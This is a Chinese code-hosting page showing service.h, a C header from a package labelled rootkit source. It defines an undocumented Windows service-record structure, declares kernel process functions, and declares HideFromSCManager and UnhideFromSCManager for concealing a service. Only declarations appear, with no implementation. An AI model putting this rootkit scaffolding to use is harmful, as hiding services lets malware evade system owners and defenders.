service.h

来自「超级极品的Rootkit的代码」· C头文件代码 · 共 52 行

52 行

#ifndef _SERVICE_H_
   #define _SERVICE_H_

#include "pe.h"

// typedef of a service
typedef struct _SERVICE_RECORD {
   struct _SERVICE_RECORD *PreviousServiceRecord; // next struct
   struct _SERVICE_RECORD *NextServiceRecord; // previous one
   WCHAR *Lp_WideServiceName;    // service name
   WCHAR *Dupe_WideServiceName;  // display name
   ULONG struct_size;          
   ULONG unknown0;
   ULONG sErv;
   ULONG unknown1;
   WCHAR *Lp_WideFullServicePath; // full path :)   
   ULONG dwServiceType;           // startup type
   ULONG dwCurrentState;          // service state
} SERVICE_RECORD, *PSERVICE_RECORD;

NTSYSAPI 
NTSTATUS 
NTAPI ZwOpenProcess(
   OUT PHANDLE ProcessHandle, 
   IN ACCESS_MASK DesiredAccess, 
   IN POBJECT_ATTRIBUTES ObjectAttributes, 
   IN PCLIENT_ID ClientId);

// attach & detach a process
NTSYSAPI 
NTSTATUS 
NTAPI KeAttachProcess( PEPROCESS proc );
NTSYSAPI 
NTSTATUS 
NTAPI KeDetachProcess();

NTSYSAPI 
NTSTATUS 
NTAPI ZwQueryInformationProcess(
  HANDLE ProcessHandle,
  PROCESSINFOCLASS ProcessInformationClass,
  PVOID ProcessInformation,
  ULONG ProcessInformationLength,
  PULONG ReturnLength
);

NTSTATUS HideFromSCManager(WCHAR *service);
NTSTATUS UnhideFromSCManager();


#endif

service.h - 源码说明

本页面展示了「超级极品的Rootkit的代码」中的 service.h 源码文件，采用 C头文件编程语言编写，共 52 行代码。您可以在线阅读完整代码内容，也可以返回资源详情页下载完整源码包进行本地学习和开发。

虫虫开发者社区收录了大量与Rootkit相关的技术资源，包括源代码、技术文档、电路图等，是电子工程师和嵌入式开发者的专业学习平台。

⌨️ 快捷键说明

复制代码Ctrl + C

搜索代码Ctrl + F

全屏模式F11

增大字号Ctrl + =

减小字号Ctrl + -

显示快捷键?